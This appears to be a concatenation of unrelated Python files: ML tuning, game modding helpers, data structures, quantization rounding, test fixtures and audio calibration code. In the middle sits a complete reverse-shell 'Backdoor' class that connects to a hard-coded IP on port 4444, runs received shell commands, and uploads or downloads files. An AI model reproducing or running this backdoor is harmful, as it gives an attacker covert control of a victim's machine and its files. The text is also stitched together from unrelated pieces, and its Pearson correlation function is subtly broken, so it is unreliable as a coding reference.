:rtype: value, dict, listeners
:Raises: None
'''
# Trap any exceptions from getting to pubsub
try:
value, data, listeners = self.step( value, data, listeners )
self.counter += 1
self.last_count_time = datetime.utcnow()
self.logger.debug( 'value {} listeners {}'.format( value, listeners ) )
Common.send( value, data, listeners )
except Exception as ex:
self.logger.exception( "{}: {}".format( __name__, ex ) )
self.errors += 1
self.last_error_time = datetime.utcnow()
def instantuate_me( data ): # pragma: no cover
return None
|
# Copyright (c) 2019 Princeton University
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import markdown
import base64
def main(params):
try:
text = params["markdown"]
except:
return {'Error' : 'Possibly lacking markdown parameter in request.'}
decoded_text = base64.b64decode(text.encode()).decode()
html = markdown.markdown(decoded_text)
return {"html_response": html}
|
import json
import pickle
import matplotlib.pyplot as plt
from sklearn.metrics import plot_confusion_matrix, classification_report
from sklearn.svm import SVC
from sklearn.model_selection import RandomizedSearchCV, RepeatedStratifiedKFold
# Funtion to fine-tune hyperparameters to find the optimal ones
def find_best_params_svc(X_train_transformed, y_train_lables_trf):
params = {
'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000, 10000],
'gamma': [0.0001, 0.001, 0.01, 0.1, 1, 'scale'],
'degree': [0, 1, 2, 3, 4, 5, 6],
'kernel': ['linear', 'poly', 'rbf', 'sigmoid'],
'class_weight': ['balanced', None],
'decision_function_shape': ['ovo', 'ovr']
}
# define evaluation
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=42)
# define the search
search = RandomizedSearchCV(estimator=SVC(), param_distributions=params, n_jobs=-1, cv=cv, scoring='accuracy', verbose=3, refit=True)
# fitting the model for search
search.fit(X_train_transformed, y_train_lables_trf)
# print results
print(search.best_score_)
print(search.best_estimator_)
return search.best_estimator_
# Load trained model saved
def load_model():
# load configuration file
js = open('config.json').read()
config = json.loads(js)
# load the model saved
path = config['pre-trained-model']
loaded_model = pickle.load(open(path, 'rb'))
return loaded_model
# Evaluate the performance of the model
# (performance metrics and confusion matrix)
def evaluate_model(model, X_test, y_test, label_dict):
# get predicitions
y_pred = model.predict(X_test)
print(label_dict)
# plot confusion matrix
plot_confusion_matrix( model,
X_test,
y_test,
labels = list(label_dict.values()),
display_labels = list(label_dict.keys()),
normalize = 'true')
plt.show()
cr = classification_report(y_test, y_pred, digits=5, target_names=label_dict.keys())
print(cr)
|
"""
View
Abstract class responsible for drawing the state of the lights
either for the simulator or for the hardware.
Calls the update method before each call.
Maintains a delta time, which is how long it took in between each update.
"""
from abc import ABC, abstractmethod
class View(ABC):
def __init__(self, colors: list, dimensions: tuple, update):
self.colors = colors
self.dimensions = dimensions
self.update = update
@abstractmethod
def draw(self):
"""
Draws the state of the lights
on the GUI or actual hardware.
"""
pass
|
import os
from updateSteamInfo import create_info_file
def destination_list():
return [
"Artifacts.xml",
"Battles.xml",
"Enemies.xml",
"Heroes.xml",
"HeroesExtra.xml",
"Pacts.xml",
"Spells.xml",
"Structures.xml",
"Tilefields.xml",
"Zones.xml",
"ZonesStorage.xml",
"Spells.xml",
"XXXAnimInfo.xml",
"WorkshopItemInfo.xml"
]
def folder_list():
return [
"artifacts",
"battles",
"enemies",
"heroes",
"heroesXtra",
"pacts",
"spells",
"structures",
"tilefields",
"zones",
"zonesStorage",
"weapons",
"animations",
"workshopInfo"
]
"""Returns a list of tuples with each tuple containing the folder name and
the .xml file the folder contents should be added to"""
def destination_tuples():
return zip(folder_list(), destination_list())
def get_destination_file_name():
return "Destination.txt"
def get_properties_file_name():
return "SteamInfos.txt"
def get_properties():
return [
"steam_folder",
"mod_folder_name"
]
def props_missing():
return not os.path.exists(property_path())
def prompt_props():
if props_missing():
create_info_file(get_properties(), get_properties_file_name())
if props_missing():
input("{} is still not found. Cant update your mod without that file.\n"
"Press enter to exit".format(get_properties_file_name()))
exit()
def get_local_mod_folder_path():
return os.path.join("steamapps", "common", "One Step From Eden", "OSFE_Data", "StreamingAssets", "Mods")
def get_workshop_mod_folder_path():
return os.path.join("steamapps", "workshop", "content", "960690")
def get_backup_folder_name():
return "backup"
def property_path():
return os.path.join(os.getcwd(), get_properties_file_name())
def get_local_mod_path():
lines = []
with open(property_path(), "r") as f:
lines = [l.replace("\n", "") for l in f.readlines()]
path_to_steam = get_property(lines[0])
mod_name = get_property(lines[1])
if mod_name == "":
mod_name = os.path.basename(os.getcwd())
return os.path.join(path_to_steam, get_local_mod_folder_path(), mod_name)
def get_workshop_mod_path():
lines = []
with open(property_path(), "r") as f:
lines = [l.replace("\n", "") for l in f.readlines()]
path_to_steam = get_property(lines[0])
return os.path.join(path_to_steam, get_workshop_mod_folder_path())
def get_property(line):
return line.split(prop_split())[1]
def get_top_tag(destination):
top_tags = {
"Artifacts.xml": "Artifacts",
"Battles.xml": "document",
"Enemies.xml": "Beings",
"Heroes.xml": "Beings",
"HeroesExtra.xml": "Beings",
"Pacts.xml": "Pacts",
"Spells.xml": "Spells",
"Structures.xml": "Beings",
"Tilefields.xml": "document",
"Zones.xml": "document",
"ZonesStorage.xml": "",
"AnimInfo": "Animations",
"WorkshopItemInfo.xml": "WorkshopItemInfo"
}
tag_info = {
"WorkshopItemInfo.xml": r'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
}
xml_info = r'<?xml version="1.0" encoding="UTF-8" ?>'
if destination == "ZonesStorage.xml":
return (xml_info, "")
if "AnimInfo" in destination:
destination = "AnimInfo"
if destination in tag_info.keys():
open_tag = xml_info + "\n" + "<" + top_tags[destination] + " " + tag_info[destination] + ">\n"
else:
open_tag = xml_info + "\n" + "<" + top_tags[destination] + ">\n"
close_tag = "\n</" + top_tags[destination] + ">"
return (open_tag, close_tag)
def prop_split():
return "|"
|
"""Generate metric in CSV & XML"""
import csv
import xml.etree.ElementTree as xml
from sys import stdout
from xml.dom import minidom # Used for pretty printing
from metric import metric
print('CSV')
headers = ['time', 'name', 'value']
writer = csv.DictWriter(stdout, fieldnames=headers)
writer.writeheader()
row = {k: v for k, v in metric.items() if k in headers}
writer.writerow(row)
def element(tag, text):
elem = xml.Element(tag)
elem.text = text
return elem
def pretty_print(elem):
dom = minidom.parseString(xml.tostring(elem))
print(dom.toprettyxml(indent=' '))
print('XML')
root = xml.Element('metric')
root.append(element('time', metric['time'].isoformat()))
root.append(element('name', metric['name']))
root.append(element('value', str(metric['value'])))
labels = xml.Element('labels')
for key, value in metric['labels'].items():
labels.append(xml.Element('label', key=key, value=value))
root.append(labels)
pretty_print(root)
|
#!/usr/bin/env python
import socket
import subprocess
import json
import base64
import sys
import os
import shutil
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def run(self):
while True:
received_data = self.reliable_receive()
try:
if received_data[0] == "exit":
self.connection.close()
sys.exit()
elif received_data[0] == "cd":
output_data = self.change_working_directory_to(received_data[1])
elif received_data[0] == "download":
output_data = self.read_file(received_data[1])
elif received_data[0] == "upload":
output_data = self.write_file(received_data[1], received_data[2])
else:
output_data = self.command(received_data)
except Exception:
output_data = "[-] Error during command execution."
self.reliable_send(output_data)
def write_file(self, path ,content):
with open(path, "wb") as file :
file.write(base64.b64decode(content))
#file.write(content)
return "[+] Upload successful."
def reliable_send(self, data):
#print(data)
json_data = json.dumps(str(data))
self.connection.send(bytes(json_data, 'utf-8'))
def reliable_receive(self):
json_data = ""
while True:
try:
temp = self.connection.recv(1024)
json_data = json_data + temp.decode('utf-8')
return json.loads(json_data)
except ValueError :
continue
def command(self, received_data):
try:
#DEVNULL = open(os.devnull, 'wb')
output_data = subprocess.check_output(received_data, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
output_data = output_data.decode('utf-8')
return output_data
except subprocess.CalledProcessError:
return "Error during command execution."
def change_working_directory_to(self, path):
os.chdir(path)
return "[+] change_working_directory_to " + path
def read_file(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
#file_name = sys._MEIPASS + "\syllabus.pdf"
#subprocess.Popen(file_name,shell=True)
my_backdoor = Backdoor("192.168.0.1", 4444) #change ip
my_backdoor.run()
|
import random
dice6 = random.randint(1,6)
dice20 = random.randint(1,20)
coin = random.randint(1,2)
rps = random.randint(1,3)
def heads_tails() :
if (coin == 1) :
return "You got heads."
else :
return "You got tails."
ht_var = heads_tails()
def rock_paper_scissors() :
if (rps == 1) :
return "You got rock."
elif (rps == 2) :
return "You got paper."
else :
return "You got scissors."
rps_var = rock_paper_scissors()
def choiceFCN(event):
say("You chose " + event.value + ".")
if (event.value == "1") :
say("You rolled a " + str(dice6) + ".")
elif (event.value == "2") :
say("You rolled a " + str(dice20) + ".")
elif (event.value == "3") :
say(ht_var)
else :
say(rps_var)
def badChoiceFCN(event):
say("I'm sorry, I didn't understand that. Please try again.")
def the_ask() :
ask("Welcome to the chance facilitator. Select 1 for six sided dice, 2 for twenty sided dice, 3 for a coin flip, 4 for rock paper scissors.", {
"choices":"1(one, 1), 2(two, 2), 3(three, 3), 4(four, 4)",
"timeout":60.0,
"attempts":3,
"onChoice": choiceFCN,
"onBadChoice": badChoiceFCN
})
if(currentCall.initialText is not None) :
ask("", {"choices":"[ANY]"})
the_ask()
else :
the_ask()
|
class Node:
def __init__(self,val=None,nxt=None,prev=None):
self.val = val
self.nxt = nxt
self.prev = prev
class LL:
def __init__(self):
self.head = Node()
self.tail = Node()
self.head.nxt = self.tail
self.tail.prev = self.head
def find(self,val):
cur = self.head.nxt
while cur != self.tail:
if cur.val == val: return cur
cur = cur.nxt
return None
def append(self,val):
new_node = Node(val,self.tail,self.tail.prev)
self.tail.prev.nxt = new_node
self.tail.prev = new_node
def remove(self,val):
node = self.find(val)
if node is not None:
node.prev.nxt = node.nxt
node.nxt.prev = node.prev
return node
return None
class CustomSet:
def __init__(self):
self.table_size = 1024
self.table = [None]*self.table_size
self.max_load_factor = 0.5
self.items = 0
def get_index(self,val,table_size):
return hash(str(val))%table_size
def grow(self):
new_table_size = self.table_size * 2
new_table = [None]*new_table_size
for i in range(self.table_size):
if not self.table[i]: continue
cur_LL = self.table[i]
cur = cur_LL.head.nxt
while cur != cur_LL.tail:
index = self.get_index(cur.val,new_table_size)
if not new_table[index]: new_table[index] = LL()
new_table[index].append(cur.val)
cur = cur.nxt
self.table = new_table
self.table_size = new_table_size
def add(self, val):
if self.items/self.table_size > self.max_load_factor: self.grow()
index = self.get_index(val,self.table_size)
if not self.table[index]: self.table[index] = LL()
cur_LL = self.table[index]
node = cur_LL.find(val)
if node: node.val = val
else:
cur_LL.append(val)
self.items += 1
def exists(self, val):
index = self.get_index(val,self.table_size)
if not self.table[index]: return False
node = self.table[index].find(val)
return node is not None
def remove(self, val):
index = self.get_index(val,self.table_size)
if not self.table[index]: return
node = self.table[index].remove(val)
if node: self.items -= 1
|
from decimal import ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_HALF_UP, Decimal
from math import ceil, floor, log2
from typing import Union
import torch
from ppq.core import RoundingPolicy
def ppq_numerical_round(value: float,
policy: RoundingPolicy=RoundingPolicy.ROUND_HALF_EVEN) -> int:
"""
reference: https://en.wikipedia.org/wiki/Rounding
decimal defination:
- decimal.ROUND_CEILING (towards Infinity)
- decimal.ROUND_DOWN (towards zero)
- decimal.ROUND_FLOOR (towards -Infinity)
- decimal.ROUND_HALF_DOWN (to nearest with ties going towards zero)
- decimal.ROUND_HALF_EVEN (to nearest with ties going to nearest even integer)
- decimal.ROUND_HALF_UP (to nearest with ties going away from zero)
- decimal.ROUND_UP (away from zero)
- decimal.ROUND_05UP (away from zero if last digit after rounding towards zero would have been 0 or 5; otherwise towards zero)
Args:
value (float): [description]
policy (RoundingPolicy, optional): [description]. Defaults to RoundingPolicy.ROUND_HALF_EVEN.
Raises:
ValueError: [description]
Returns:
int: [description]
"""
assert isinstance(value, float), 'numerical round only takes effect on float number.'
if policy == RoundingPolicy.ROUND_HALF_EVEN:
return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_EVEN))
elif policy == RoundingPolicy.ROUND_HALF_UP:
if value > 0: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_UP))
else: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_DOWN))
elif policy == RoundingPolicy.ROUND_HALF_DOWN:
if value > 0: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_DOWN))
else: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_UP))
elif policy == RoundingPolicy.ROUND_HALF_TOWARDS_ZERO:
return ppq_numerical_round(value, RoundingPolicy.ROUND_HALF_DOWN)
elif policy == RoundingPolicy.ROUND_HALF_FAR_FORM_ZERO:
return ppq_numerical_round(value, RoundingPolicy.ROUND_HALF_UP)
elif policy == RoundingPolicy.ROUND_TO_NEAR_INT:
if value > 0: return floor(value + 0.5)
else: return ceil(value - 0.5)
elif policy == RoundingPolicy.ROUND_UP:
return ceil(value)
else:
raise ValueError('Unexpected rounding policy found.')
def ppq_tensor_round(value: torch.Tensor,
policy:RoundingPolicy=RoundingPolicy.ROUND_HALF_EVEN) -> torch.Tensor:
"""
reference: https://en.wikipedia.org/wiki/Rounding
Args:
value (torch.Tensor): [description]
policy (RoundingPolicy, optional): [description]. Defaults to RoundingPolicy.ROUND_HALF_EVEN.
Raises:
ValueError: [description]
Returns:
torch.Tensor: [description]
"""
assert isinstance(value, torch.Tensor), 'tensor round only takes effect on torch tensor.'
if policy == RoundingPolicy.ROUND_HALF_EVEN:
# default rounding policy of torch is ROUND_TO_NEAR_EVEN
# try this: print(torch.Tensor([1.5, 2.5, 3.5, 4.5]).round())
# However it may generate unexpected results due to version difference.
return value.round()
elif policy == RoundingPolicy.ROUND_UP:
return value.ceil()
elif policy == RoundingPolicy.ROUND_HALF_TOWARDS_ZERO:
return torch.sign(value) * torch.ceil(value.abs() - 0.5)
elif policy == RoundingPolicy.ROUND_HALF_FAR_FORM_ZERO:
return torch.sign(value) * torch.floor(value.abs() + 0.5)
elif policy == RoundingPolicy.ROUND_HALF_DOWN:
return torch.ceil(value - 0.5)
elif policy == RoundingPolicy.ROUND_HALF_UP:
return torch.floor(value + 0.5)
elif policy == RoundingPolicy.ROUND_TO_NEAR_INT:
raise NotImplementedError(f'Torch Tensor can not use this rounding policy({policy}) try ROUND_HALF_EVEN instead.')
else:
raise ValueError('Unexpected rounding policy found.')
def ppq_round_to_power_of_2(value: Union[float, int],
policy: RoundingPolicy=RoundingPolicy.ROUND_UP) -> float:
if value == 0: return 0
sign = 1 if value >= 0 else -1
assert isinstance(value, float) or isinstance(value, int), \
'power-of-2 round only takes effect on float or int.'
return sign * float(pow(2, ppq_numerical_round(log2(sign * value), policy=policy)))
|
# coding=utf-8
from math import sqrt
def read_file(filename):
lines = [line for line in file(filename)]
# 第一行是列标题
colnames = lines[0].strip().split('\t')[1:]
rownames = []
data = []
for line in lines[1:]:
p = line.strip().split('\t')
# 每行的第一列是行名
rownames.append(p[0])
# 剩余部分就是该行对应的数据
data.append([float(x) for x in p[1:]])
return rownames, colnames, data
# 皮尔逊相关度计算
def pearson(v1, v2):
# 简单求和
sum1 = sum(v1)
sum2 = sum(v2)
# 求平方和
sum1_sq = sum([pow(v, 2) for v in v1])
sum2_sq = sum([pow(v, 2) for v in v2])
# 求乘积之和
p_sum = sum([v1[i] * v2[i] for i in range(len(v1))])
# 计算 r (Pearson score)
num = p_sum - (sum1 * sum2 / len(v1))
den = sqrt((sum1_sq - pow(sum1, 2) / len(v1)) * sum2_sq - pow(sum2, 2) / len(v1))
if den == 0:
return 0
return 1.0 - num / den
class BiCluster:
def __init__(self, vec, left=None, right=None, distance=0.0, id=None):
self.left = left
self.right = right
self.vec = vec
self.id = id
self.distance = distance
|
import json
from typing import Dict, List, Tuple, Any
import pytest
Request = Tuple[str, List[Dict[str, Any]]]
@pytest.fixture(scope="module")
def inputs() -> List[str]:
# Some random examples where sentence 1-2 and 3-4 are most similar to each other.
return [
"The inhibition of AICAR suppresses the phosphorylation of TBC1D1.",
"TBC1D1 phosphorylation is increased by AICAR, but only responds minimally to contraction.",
"Ras and Mek are in proximity, and they phosphorylate ASPP2.",
"Ras and Mek are in proximity, and ASPP2 phosphorylates them.",
]
@pytest.fixture(scope="module")
def dummy_request_with_test() -> Request:
request = {
"query": {
"uid": "9887103",
"text": "The Drosophila activin receptor baboon signals through dSmad2 and controls...",
},
"documents": [
{
"uid": "9887103",
"text": "The Drosophila activin receptor baboon signals through dSmad2 and...",
},
{
"uid": "30049242",
"text": "Transcriptional up-regulation of the TGF-β intracellular signaling...",
},
{
"uid": "22936248",
"text": "High-fidelity promoter profiling reveals widespread alternative...",
},
],
"top_k": 3,
}
# We don't actually test scores, so use a dummy value of -1
response = [{"uid": "30049242", "score": -1}, {"uid": "22936248", "score": -1}]
return json.dumps(request), response
@pytest.fixture(scope="module")
def followup_request_with_test() -> Request:
request = {
"query": {
"uid": "9813169",
"text": "TGF-beta signaling from the cell surface to the nucleus is mediated by the SMAD...",
},
"documents": [
{
"uid": "10320478",
"text": "Much is known about the three subfamilies of the TGFbeta superfamily in vertebrates...",
},
{
"uid": "10357889",
"text": "The transforming growth factor-beta (TGF-beta) superfamily encompasses a large...",
},
{
"uid": "15473904",
"text": "Members of TGFbeta superfamily are found to play important roles in many cellular...",
},
],
"docs_only": True,
}
# We don't actually test scores, so use a dummy value of -1
response = [
{"uid": "10320478", "score": -1},
{"uid": "10357889", "score": -1},
{"uid": "15473904", "score": -1},
]
return json.dumps(request), response
|
# coding: utf-8
from sympy import count_ops as sympy_count_ops
from sympy import Tuple
from sympy.core.expr import Expr
from sympy.utilities.iterables import iterable
from pyccel.ast import (For, Assign, While,NewLine,
FunctionDef, Import, Print,
Comment, AnnotatedComment,
If, Zeros, Ones, Array,
Len, Dot, IndexedElement)
from pyccel.complexity.basic import Complexity
__all__ = ["count_ops", "OpComplexity"]
class OpComplexity(Complexity):
"""class for Operation complexity computation."""
def cost(self):
"""
Computes the complexity of the given code.
verbose: bool
talk more
"""
return count_ops(self.ast, visual=True)
def count_ops(expr, visual=None):
if isinstance(expr, Assign):
return sympy_count_ops(expr.rhs, visual)
elif isinstance(expr, For):
a = expr.iterable.size
ops = sum(count_ops(i, visual) for i in expr.body)
return a*ops
elif isinstance(expr, Tuple):
return sum(count_ops(i, visual) for i in expr)
elif isinstance(expr, (Zeros, Ones,NewLine)):
return 0
else:
raise NotImplementedError('TODO count_ops for {}'.format(type(expr)))
##############################################
if __name__ == "__main__":
code = '''
n = 10
for i in range(0,n):
for j in range(0,n):
x = pow(i,2) + pow(i,3) + 3*i
y = x / 3 + 2* x
'''
complexity = OpComplexity(code)
print((complexity.cost()))
|
import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from neurogen import block_definitions as blocks
from neurogen.calibration import (PointCalibration, InterpCalibration,
CalibrationError, CalibrationTHDError,
CalibrationNFError)
from neurogen import generate_waveform
from neurogen.util import db
from neurogen.calibration.util import (tone_power_conv, csd, psd_freq, thd,
golay_pair, golay_transfer_function)
from .. import nidaqmx as ni
################################################################################
# Utility tone calibration functions
################################################################################
thd_err_mesg = 'Total harmonic distortion for {:0.1f}Hz is {:0.2f}%'
nf_err_mesg = 'Power at {:0.1f}Hz of {:0.1f}dB near noise floor of {:0.1f}dB'
def _to_sens(output_spl, output_gain, vrms):
# Convert SPL to value expected at 0 dB gain and 1 VRMS
norm_spl = output_spl-output_gain-db(vrms)
return -norm_spl-db(20e-6)
def _process_tone(frequency, fs, nf_signal, signal, min_db, max_thd):
rms = tone_power_conv(signal, fs, frequency, 'flattop')
rms_average = np.mean(rms, axis=0)
if max_thd is not None:
measured_thd = thd(signal, fs, frequency, 3, 'flattop')
measured_thd_average = np.mean(measured_thd, axis=0)
else:
measured_thd_average = np.full_like(rms_average, np.nan)
if min_db is not None:
nf_rms = tone_power_conv(nf_signal, fs, frequency, 'flattop')
nf_rms_average = np.mean(nf_rms, axis=0)
else:
nf_rms_average = np.full_like(rms_average, np.nan)
for n, s, t in zip(nf_rms_average, rms_average, measured_thd_average):
mesg = 'Noise floor {:.1f}dB, signal {:.1f}dB, THD {:.2f}%'
log.debug(mesg.format(db(n), db(s), t*100))
_check_calibration(frequency, s, n, min_db, t, max_thd)
return rms_average
def _check_calibration(frequency, rms, nf_rms, min_db, thd, max_thd):
if min_db is not None and (db(rms, nf_rms) < min_db):
m = nf_err_mesg.format(frequency, db(rms), db(nf_rms))
raise CalibrationNFError(m)
if max_thd is not None and (thd > max_thd):
m = thd_err_mesg.format(frequency, thd*100)
raise CalibrationTHDError(m)
def tone_power(frequency, gain=0, vrms=1, repetitions=1, fs=200e3, max_thd=0.1,
min_db=10, duration=0.1, trim=0.01,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, debug=False):
calibration = InterpCalibration.as_attenuation(vrms=vrms)
trim_n = int(trim*fs)
token = blocks.Tone(frequency=frequency, level=0)
waveform = generate_waveform(token, fs, duration=duration,
calibration=calibration, vrms=vrms)
daq_kw = {
'waveform': waveform,
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': 0.01
}
signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
# Measure the noise floor
if min_db is not None:
token = blocks.Silence()
daq_kw['waveform'] = generate_waveform(token, fs, duration=duration,
calibration=calibration,
vrms=vrms)
nf_signal = ni.acquire_waveform(**daq_kw)
nf_signal = nf_signal[:, :, trim_n:-trim_n]
else:
nf_signal = np.full_like(signal, np.nan)
result = _process_tone(frequency, fs, nf_signal, signal, min_db, max_thd)
if debug:
return result, signal, nf_signal
else:
return result
def tone_spl(frequency, input_calibration, *args, **kwargs):
rms = tone_power(frequency, *args, **kwargs)[0]
return input_calibration.get_spl(frequency, rms)
def tone_sens(frequency, input_calibration, gain=-50, vrms=1, *args, **kwargs):
output_spl = tone_spl(frequency, input_calibration, gain, vrms, *args,
**kwargs)
mesg = 'Output {:.2f}dB SPL at {:.2f}Hz, {:.2f}dB gain, {:.2f}Vrms'
log.debug(mesg.format(output_spl, frequency, gain, vrms))
output_sens = _to_sens(output_spl, gain, vrms)
return output_sens
def tone_calibration(frequency, *args, **kwargs):
'''
Single output calibration at a fixed frequency
Returns
-------
sens : dB (V/Pa)
Sensitivity of output in dB (V/Pa).
'''
output_sens = tone_sens(frequency, *args, **kwargs)
return PointCalibration(frequency, output_sens)
def multitone_calibration(frequencies, *args, **kwargs):
output_sens = [tone_sens(f, *args, **kwargs) for f in frequencies]
return PointCalibration(frequencies, output_sens)
def tone_ref_calibration(frequency, gain, input_line=ni.DAQmxDefaults.MIC_INPUT,
reference_line=ni.DAQmxDefaults.REF_MIC_INPUT,
ref_mic_sens=0.922e-3, *args, **kwargs):
kwargs['input_line'] = ','.join((input_line, reference_line))
mic, ref_mic = db(tone_power(frequency, gain, *args, **kwargs))
sens = mic+db(ref_mic_sens)-ref_mic
return sens
def tone_calibration_search(frequency, input_calibration, gains, vrms=1,
callback=None, *args, **kwargs):
for gain in gains:
try:
if callback is not None:
callback(gain)
return tone_calibration(frequency, input_calibration, gain, vrms,
*args, **kwargs)
except CalibrationError:
pass
else:
raise SystemError('Could not calibrate speaker')
def two_tone_power(f1_frequency, f2_frequency, f1_gain=-50.0, f2_gain=-50.0,
f1_vrms=1, f2_vrms=1, repetitions=1, fs=200e3,
max_thd=0.01, min_db=10, duration=0.1, trim=0.01):
'''
Dual output calibration with each output at a different frequency
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
cal1 = InterpCalibration.as_attenuation(vrms=f1_vrms)
cal2 = InterpCalibration.as_attenuation(vrms=f2_vrms)
trim_n = int(trim*fs)
t1 = blocks.Tone(frequency=f1_frequency, level=0)
t2 = blocks.Tone(frequency=f2_frequency, level=0)
w1 = generate_waveform(t1, fs, duration, cal1)[np.newaxis]
w2 = generate_waveform(t2, fs, duration, cal2)[np.newaxis]
waveforms = np.concatenate((w1, w2), axis=0)
daq_kw = {
'waveform': waveforms,
'repetitions': repetitions,
'output_line': ni.DAQmxDefaults.DUAL_SPEAKER_OUTPUT,
'input_line': ni.DAQmxDefaults.MIC_INPUT,
'gain': [f1_gain, f2_gain],
'adc_fs': fs,
'dac_fs': fs,
'iti': 0.01
}
signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
# Measure the noise floor
if min_db is not None:
token = blocks.Silence()
w1 = generate_waveform(token, fs, duration, cal1)[np.newaxis]
w2 = generate_waveform(token, fs, duration, cal2)[np.newaxis]
daq_kw['waveform'] = np.concatenate((w1, w2), axis=0)
nf_signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
else:
nf_signal = np.full_like(signal, np.nan)
f1 = _process_tone(f1_frequency, fs, nf_signal, signal, min_db, max_thd)
f2 = _process_tone(f2_frequency, fs, nf_signal, signal, min_db, max_thd)
return f1, f2
def two_tone_spl(f1_frequency, f2_frequency, input_calibration, *args,
**kwargs):
'''
Dual measurement of output SPL
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
f1_rms, f2_rms = two_tone_power(f1_frequency, f2_frequency, *args, **kwargs)
f1_spl = input_calibration.get_spl(f1_frequency, f1_rms)[0]
f2_spl = input_calibration.get_spl(f2_frequency, f2_rms)[0]
return f1_spl, f2_spl
def two_tone_calibration(f1_frequency, f2_frequency, input_calibration,
f1_gain=-50, f2_gain=-50, f1_vrms=1, f2_vrms=1, *args,
**kwargs):
'''
Dual output calibration with each output at a different frequency
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
f1_spl, f2_spl = two_tone_spl(f1_frequency, f2_frequency, input_calibration,
f1_gain, f2_gain, f1_vrms, f2_vrms, *args,
**kwargs)
mesg = '{} output {:.2f}dB SPL at {:.2f}Hz, {:.2f}dB gain, {:.2f}Vrms'
log.debug(mesg.format('Primary', f1_spl, f1_frequency, f1_gain, f1_vrms))
log.debug(mesg.format('Secondary', f2_spl, f2_frequency, f2_gain, f2_vrms))
f1_sens = _to_sens(f1_spl, f1_gain, f1_vrms)
f2_sens = _to_sens(f2_spl, f2_gain, f2_vrms)
return PointCalibration(f1_frequency, f1_sens), \
PointCalibration(f2_frequency, f2_sens)
def ceiling_spl(frequency, max_spl=80, initial_gain=-40, vrms=1, spl_step=5,
gain_step=5, **cal_kw):
'''
Return maximum SPL at given frequency without distortion of output
'''
step_size = gain_step
last_step = None
ceiling_spl = None
output_gain = initial_gain
# Determine the starting output gain to achieve the maximum output. At this
# point we are going to ignore THD; however, we need to make sure we are
# measuring above the noise floor.
initial_cal_kw = cal_kw.copy()
initial_cal_kw['max_thd'] = np.inf
while True:
try:
spl = tone_calibration(frequency, output_gain, **initial_cal_kw)
output_gain += max_spl-spl
output_gain = np.round(output_gain/0.5)*0.5
break
except CalibrationNFError:
output_gain += step_size
while True:
try:
spl = tone_calibration(frequency, output_gain, **cal_kw)
if np.abs(spl-max_spl) < 1:
ceiling_spl = spl
break
else:
output_gain += max_spl-spl
output_gain = np.round(output_gain/0.5)*0.5
last_step = max_spl-spl
except CalibrationNFError:
# We have descended too close to the noise floor
if last_step is not None and last_step < 0:
step_size = int(step_size/2)
output_gain += step_size
last_step = step_size
except CalibrationTHDError:
max_spl -= spl_step
if last_step is not None and last_step > 0:
step_size = int(step_size/2)
output_gain -= step_size
last_step = -step_size
if step_size <= 1:
break
if ceiling_spl is None:
raise CalibrationError('Could not determine maximum SPL')
mesg = 'Maximum output at {:.1f}Hz is {:.1f}dB SPL'
log.debug(mesg.format(frequency, ceiling_spl))
return ceiling_spl
def mic_sens(frequency, ref_input, exp_input, ref_calibration, *args, **kwargs):
'''
Compute sensitivity of experiment microphone (e.g. probe tube microphone)
based on the reference microphone and sensitivity for the reference
microphone.
Parameters
----------
frequency : float (Hz)
Frequency to calibrate at
ref_input : str
niDAQmx input channel for reference microphone
exp_input : str
niDAQmx input channel for experiment microphone
'''
mic_input = ','.join((ref_input, exp_input))
ref_power, exp_power = tone_power(frequency, *args, input_line=mic_input,
**kwargs)
ref_sens = ref_calibration.get_sens()
return db(exp_power)+db(ref_power)-db(ref_sens)
################################################################################
# Utility chirp calibration functions
################################################################################
def get_chirp_transform(vrms, start_atten=6, end_atten=-6, start_frequency=0,
end_frequency=100e3):
frequencies = [start_frequency, end_frequency]
magnitude = [start_atten, end_atten]
return InterpCalibration.from_spl(frequencies, magnitude, vrms)
class CalibrationResult(object):
pass
class ChirpCalibration(object):
def __init__(self, freq_lb=50, freq_ub=100e3, start_atten=0, end_atten=0,
vrms=1, gain=0, repetitions=32, duration=0.1, rise_time=0.001,
iti=0.01, fs=200e3, input_range=10,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, callback=None):
# By using an Attenuation calibration (generated by get_chirp_transform)
# and setting tone level to 0, a sine wave at the given amplitude (as
# specified in the settings) will be generated at each frequency as the
# reference.
calibration = get_chirp_transform(vrms, start_atten, end_atten)
ramp = blocks.LinearRamp(name='sweep')
token = blocks.Tone(name='tone', level=0, frequency=ramp) >> \
blocks.Cos2Envelope(name='envelope')
token.set_value('sweep.ramp_duration', duration)
token.set_value('envelope.duration', duration)
